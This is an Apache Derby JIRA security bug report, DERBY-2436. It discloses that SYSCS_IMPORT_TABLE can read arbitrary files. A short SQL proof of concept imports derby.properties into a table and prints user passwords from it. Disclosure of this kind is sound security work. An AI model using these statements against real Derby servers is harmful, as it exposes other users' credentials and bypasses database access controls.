SYSCS_IMPORT_TABLE can be used to read derby files
--------------------------------------------------
Key: DERBY-2436
URL: https://issues.apache.org/jira/browse/DERBY-2436
Project: Derby
Issue Type: Bug
Components: Security
Reporter: Daniel John Debrunner
Priority: Critical
There are no controls over which files SYSCS_IMPORT_TABLE can read, thus
allowing any user that has permission to execute the procedure to try and
access information that they have no permissions to do so. E.g. even with the
secure-by-default network server I can execute three lines of SQL to view to
contents of derby.properties, thus seeing passwords of other users, or the
address of the ldap server.
create table t (c varchar(32000));
CALL SYSCS_UTIL.SYSCS_IMPORT_TABLE(NULL, 'T', 'derby.properties', NULL, NULL,
'ISO8859_1', 0);
ij> select * from T;
C
----------------------------------------------
derby.connection.requireAuthentication=true
derby.authentication.provider=BUILTIN
derby.user.SA=sapwd
derby.user.MARY=marypwd
Also a similar trick could be attempted against the actual data files, allowing
a user to attempt to bypass grant/revoke security, especially no that binary
data can be exported/imported.
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.
